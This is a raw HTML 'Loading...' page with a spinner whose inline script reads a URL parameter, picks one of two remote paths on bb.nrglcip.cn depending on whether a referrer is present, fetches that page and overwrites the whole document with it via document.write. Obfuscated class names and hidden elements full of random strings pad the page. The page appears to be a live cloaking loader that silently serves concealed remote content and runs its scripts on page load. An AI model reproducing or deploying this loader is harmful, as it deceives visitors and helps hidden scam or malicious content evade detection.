<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cCjy1wLz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cCjy1wLz .Pw7z1E8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cCjy1wLz .content {
            line-height: 50px;
            text-align: center
        }

        .cCjy1wLz .img {
            width: 100%
        }

        .cCjy1wLz .OgGbxYG {
            text-align: center
        }

        .cCjy1wLz .OgGbxYG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cCjy1wLz .OgGbxYG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cCjy1wLz .OgGbxYG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cCjy1wLz .OgGbxYG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cCjy1wLz .OgGbxYG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cCjy1wLz .OgGbxYG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cCjy1wLz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aCnopimPee(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bSfO0aq = aCnopimPee('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bSfO0aq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bSfO0aq +".html?a=share";
		}
		
        vyTyfNpzfg=url+"#"+new Date().getTime();
        vyTyfNpzfg && function() {
            $.get(vyTyfNpzfg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >QHv4dbHHXOCprag9JqE2AoF3jDa5EVFTOdF4vya9KCXrR9TnD70bkL0x8gEgtQuROTLkCsAueDD</ul>
<p  style='display:none'>FbRaXJzNGMhZCNDRCxVXKk3F0Xe1iNlwmpR0jGUTQWuLNUm6ZUNM</p>
<img  src='' style='display:none'>
<span style='display:none'>h6qk6xDGd8EFSKEzBFCMsy2GapXycz2UELOzToOhKZMYb8i47o8iWOV8tGwjtKe0Ovt5J2XubA2RZPnxKzXJa</span>
<li style='display:none' >KvFdoQXjD6wVQtlhK6pjbbZotNJjAqBTZiCYjFkN7fxu5suFwCDzG1G</li>
<b style='display:none' >jUWy8H5TLBbkXn5aQL13eDBLmCFhTCxnfaLdqY1a</b><div class="cCjy1wLz">
    <div class="Pw7z1E8">
        <div class="OgGbxYG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >RQN6mV0L2VVBZ5R24</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>vRCKM7LuSuJYE</a>
<b style='display:none' >RQN6mV0L2VVBZ5R24</b>
<div style='display:none'>Jb3m2E2y0veiHs8PAHvnhCIv11gKQ</div>
<a  href='#' style='display:none'>vRCKM7LuSuJYE</a>
<span style='display:none'>PPehPvFhs55O1iMjcnKse4aaDd3lXUhrKRrWI0KQagMhKbvLH3613wEe1a53cUmVV5X6Hh7UJ8CB0Ozt6</span></body>
</html>